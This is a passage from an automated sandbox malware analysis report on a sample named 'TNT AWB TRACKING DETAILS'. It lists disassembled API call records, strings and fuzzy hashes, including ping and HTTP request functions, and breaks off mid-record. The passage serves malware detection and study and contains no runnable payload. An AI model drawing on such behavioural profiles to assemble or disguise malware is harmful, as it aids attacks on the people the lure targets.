                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                    • Instruction ID: 17cc07d1f4c06d5ad5d9c4b7d84dffa1b2c2d7ecbcc6f4b4fb2b95c5379a37cc
                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                    • Instruction Fuzzy Hash: 5771F576A00B5FABD714AE7ADC41B6AB3E8AF14364F146229F554F72C1E770DE008B90
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22542
                                                    • GetMenuItemInfoW.USER32(00F85890,000000FF,00000000,00000030), ref: 00F225A3
                                                    • SetMenuItemInfoW.USER32(00F85890,00000004,00000000,00000030), ref: 00F225D9
                                                    • Sleep.KERNEL32(000001F4), ref: 00F225EB
                                                    • GetMenuItemCount.USER32(?), ref: 00F2262F
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F2264B
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00F22675
                                                    • GetMenuItemID.USER32(?,?), ref: 00F226BA
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F22700
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F22714
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F22735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: b06a6ebf63b145d4bd681fede063525fbe963c54392c488b191910d0ed895a66
                                                    • Instruction ID: 00bf1319c1054de2d47c34f750adec81cea033a3c8a74c7bdbd963ea88386b9b
                                                    • Opcode Fuzzy Hash: b06a6ebf63b145d4bd681fede063525fbe963c54392c488b191910d0ed895a66
                                                    • Instruction Fuzzy Hash: 8561CF7590026DBFDB61CFA4EC88EBE7BB8EB02314F184059F841A7250D735AD05EB21
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F46FA5
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F46FA8
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F46FCC
                                                    • _memset.LIBCMT ref: 00F46FDD
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F46FEF
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F47067
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 864d07814f9f7c00379cee4b8ac304d7e9c1707cb6e9232f5f5d1529facd6897
                                                    • Instruction ID: d6c226466871cfd3308cbf9df2d090bfdda3174a2075235113284bbc909ad73f
                                                    • Opcode Fuzzy Hash: 864d07814f9f7c00379cee4b8ac304d7e9c1707cb6e9232f5f5d1529facd6897
                                                    • Instruction Fuzzy Hash: 74617B75900248AFDB11DFA8CC81EEE7BF8EB49710F10415AFA14EB2A1D771AD45EB90
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F16BBF
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F16C18
                                                    • VariantInit.OLEAUT32(?), ref: 00F16C2A
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F16C4A
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F16C9D
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F16CB1
                                                    • VariantClear.OLEAUT32(?), ref: 00F16CC6
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F16CD3
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F16CDC
                                                    • VariantClear.OLEAUT32(?), ref: 00F16CEE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F16CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: cfea18b9a90d02b7a47f8b412cc477c2f4632ab2758b066aeb2f8c894d8bd04a
                                                    • Instruction ID: 4fc0357b1d02163cf6e32f4ed5949d9a491dfd572b805eeab076c170f08c94ed
                                                    • Opcode Fuzzy Hash: cfea18b9a90d02b7a47f8b412cc477c2f4632ab2758b066aeb2f8c894d8bd04a
                                                    • Instruction Fuzzy Hash: 0F416035A0021D9FCF04DF68D848DEEBBB9EF58351F008069E955E7261CB35A945DB90
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00F35793
                                                    • inet_addr.WSOCK32(?), ref: 00F357D8
                                                    • gethostbyname.WSOCK32(?), ref: 00F357E4
                                                    • IcmpCreateFile.IPHLPAPI ref: 00F357F2
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F35862
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F35878
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F358ED
                                                    • WSACleanup.WSOCK32 ref: 00F358F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: 7d11838f0bcffb628684337fe422fbc84427cbbc731aa43311df0e966c7b480a
                                                    • Instruction ID: b8ad7ec6f2d3403bc963cac2702e65d5556374cc9fde036e353f02353c6cf7d1
                                                    • Opcode Fuzzy Hash: 7d11838f0bcffb628684337fe422fbc84427cbbc731aa43311df0e966c7b480a
                                                    • Instruction Fuzzy Hash: 2A516032604600DFD7109F25DD49B6AB7E4EF85B30F044929F95AEB2A1DB70E845EB41
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2B4D0
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F2B546
                                                    • GetLastError.KERNEL32 ref: 00F2B550
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F2B5BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 126ae1f36cba41e2108a0741d3a1659008acb71c88de22814f41d5e53522a063
                                                    • Instruction ID: 03b93450ef5e6977e9eadeacf6251230587cf2b702e01f64c6f0439273f25163
                                                    • Opcode Fuzzy Hash: 126ae1f36cba41e2108a0741d3a1659008acb71c88de22814f41d5e53522a063
                                                    • Instruction Fuzzy Hash: 7031A235A00219DFCB00DB68D84AFAE77B4FF45310F18806AE905AB295DB719A46EB42
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F19014
                                                    • GetDlgCtrlID.USER32 ref: 00F1901F
                                                    • GetParent.USER32 ref: 00F1903B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F1903E
                                                    • GetDlgCtrlID.USER32(?), ref: 00F19047
                                                    • GetParent.USER32(?), ref: 00F19063
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F19066
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: c822aba509d4e02603e706136fbf421e6755d9f9a4f0ce1af924cebe26d9f708
                                                    • Instruction ID: 4eeb7f85c0107e6639458759d41e2df81a969a128845ff2dd0d15d51ed76f81c
                                                    • Opcode Fuzzy Hash: c822aba509d4e02603e706136fbf421e6755d9f9a4f0ce1af924cebe26d9f708
                                                    • Instruction Fuzzy Hash: 45212874A00208BBDF04EBB0CC95EFEBBB4EF5A310F100119F965972A1DB755859EB21
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F190FD
                                                    • GetDlgCtrlID.USER32 ref: 00F19108
                                                    • GetParent.USER32 ref: 00F19124
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F19127
                                                    • GetDlgCtrlID.USER32(?), ref: 00F19130
                                                    • GetParent.USER32(?), ref: 00F1914C
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F1914F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 14a09a199b21b60a4bbef244c50f631a8008434a695bfc0f254dde0b13e7107e
                                                    • Instruction ID: a5eb1916af7e9c7d02ed23e4779bc7004a7bbc89c72e24e3692726ae7982f76c
                                                    • Opcode Fuzzy Hash: 14a09a199b21b60a4bbef244c50f631a8008434a695bfc0f254dde0b13e7107e
                                                    • Instruction Fuzzy Hash: 6621FB75E01208BBDF00ABA0CC95FFEBBB4EF59300F104019F955A72A1DB755459EB21
                                                    APIs
                                                    • GetParent.USER32 ref: 00F1916F
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00F19184
                                                    • _wcscmp.LIBCMT ref: 00F19196
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F19211
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: b0460de8196331d2f0bc2b012fdcb6a3c784bf7e8ab367a52c42fbe23272907b
                                                    • Instruction ID: 9012b162d2bb9ff4caf15221e74e13d38af16713b82e63e9273e7adadd72a911
                                                    • Opcode Fuzzy Hash: b0460de8196331d2f0bc2b012fdcb6a3c784bf7e8ab367a52c42fbe23272907b
                                                    • Instruction Fuzzy Hash: DF113A3B65C34BB9FA113A24DC1ADE737EC9B15330B200026FA04F10E1EEA2A89179D5
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F388D7
                                                    • CoInitialize.OLE32(00000000), ref: 00F38904
                                                    • CoUninitialize.OLE32 ref: 00F3890E
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00F38A0E
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F38B3B
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F52C0C), ref: 00F38B6F
                                                    • CoGetObject.OLE32(?,00000000,00F52C0C,?), ref: 00F38B92
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00F38BA5
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F38C25
                                                    • VariantClear.OLEAUT32(?), ref: 00F38C35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: 49f3a065f4d5768fbae013861fdc9feec87f9b2dfe8cd2400360f7f7b82df4a3
                                                    • Instruction ID: 1f2eaacdc33cd010e7f5e2d09c8f6bb3f6311cbee9a5ca44ccf7f839dd732606
                                                    • Opcode Fuzzy Hash: 49f3a065f4d5768fbae013861fdc9feec87f9b2dfe8cd2400360f7f7b82df4a3
                                                    • Instruction Fuzzy Hash: 1FC157B1608305AFD700DF24C884A2BBBE9FF89798F00491DF9899B251DB75ED06DB52
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F27A6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: ca38a5fde66138b99ac8211975788993d28b154f74a2ab9b4b44dd5b22485b40
                                                    • Instruction ID: f51e0396ba465c667bbdb50e24e6484f5d9f1a6c864bc8f3843feea9af18b0e8
                                                    • Opcode Fuzzy Hash: ca38a5fde66138b99ac8211975788993d28b154f74a2ab9b4b44dd5b22485b40
                                                    • Instruction Fuzzy Hash: 6EB1927590832A9FDB00EFA4E885BBEB7F4FF49321F144429E901E7251D734A941EB90
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EC2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EC223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EC2250
                                                    • GetStockObject.GDI32(00000005), ref: 00EC2258
                                                    • GetClientRect.USER32(?), ref: 00EFBDBB
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EFBDD2
                                                    • GetWindowDC.USER32(?), ref: 00EFBDDE
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00EFBDED
                                                    • ReleaseDC.USER32(?,00000000), ref: 00EFBDFF
                                                    • GetSysColor.USER32(00000005), ref: 00EFBE1D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                    • String ID:
                                                    • API String ID: 3430376129-0
                                                    • Opcode ID: 3659c75f7a03cada3135761363e4060ae9a33ad66d3acea7441c6e91d1ab83e0
                                                    • Instruction ID: e14f4f09f22bd7855c31c586bf42d60549fba5f385c0e25376e41d2a926ff156
                                                    • Opcode Fuzzy Hash: 3659c75f7a03cada3135761363e4060ae9a33ad66d3acea7441c6e91d1ab83e0
                                                    • Instruction Fuzzy Hash: AC216A36500208EFDB216FA4ED08BE97B61EB6A325F114269FE29A50F1CB320955EF11
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00ECFAA6
                                                    • OleUninitialize.OLE32(?,00000000), ref: 00ECFB45
                                                    • UnregisterHotKey.USER32(?), ref: 00ECFC9C
                                                    • DestroyWindow.USER32(?), ref: 00F045D6
                                                    • FreeLibrary.KERNEL32(?), ref: 00F0463B
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F04668
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 50da2b6e59bd1b73cb5cefc3cee1b679cee4ca2b5d9a5d0a09acf26d9d54d6e6
                                                    • Instruction ID: 83b1edaa26723e2b0ec0be13a1dd9cafcc617c3db77d2738912dd184484b6c8a
                                                    • Opcode Fuzzy Hash: 50da2b6e59bd1b73cb5cefc3cee1b679cee4ca2b5d9a5d0a09acf26d9d54d6e6
                                                    • Instruction Fuzzy Hash: 6BA17A717012168FCB18EF10CA94F69F3A1AF45710F1452ADE90AAB2A1DB32AD57EF50
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00F1A439), ref: 00F1A377
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 26c1e5ae23001cdb6981b0859fae828f9c59d3a22806981e4856cd0f4045efe6
                                                    • Instruction ID: e94148a20f84d2267a6763f2986d1886560acd257af491932408c9265b971ef7
                                                    • Opcode Fuzzy Hash: 26c1e5ae23001cdb6981b0859fae828f9c59d3a22806981e4856cd0f4045efe6
                                                    • Instruction Fuzzy Hash: 0091C631A05649AADB08EFB0C442BEDFBB4BF04310F54912AD85DB7241DF3169DAEB91
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00EC2EAE
                                                      • Part of subcall function 00EC1DB3: GetClientRect.USER32(?,?), ref: 00EC1DDC
                                                      • Part of subcall function 00EC1DB3: GetWindowRect.USER32(?,?), ref: 00EC1E1D
                                                      • Part of subcall function 00EC1DB3: ScreenToClient.USER32(?,?), ref: 00EC1E45
                                                    • GetDC.USER32 ref: 00EFCD32
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EFCD45
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EFCD53
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EFCD68
                                                    • ReleaseDC.USER32(?,00000000), ref: 00EFCD70
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EFCDFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 77deb77c8eb8967ad739828647a3d70bdf2bb406105cac12f1298a75594ede83
                                                    • Instruction ID: f92d7261ca4b604c2c35abe5a699776a988a0a8397d004694a3ceeb146ca2d15
                                                    • Opcode Fuzzy Hash: 77deb77c8eb8967ad739828647a3d70bdf2bb406105cac12f1298a75594ede83
                                                    • Instruction Fuzzy Hash: 9171B03550020DDFCF258F64CA80AFA7BB5FF49318F34526AEE557A266C7328841DB60
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F31A50
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F31A7C
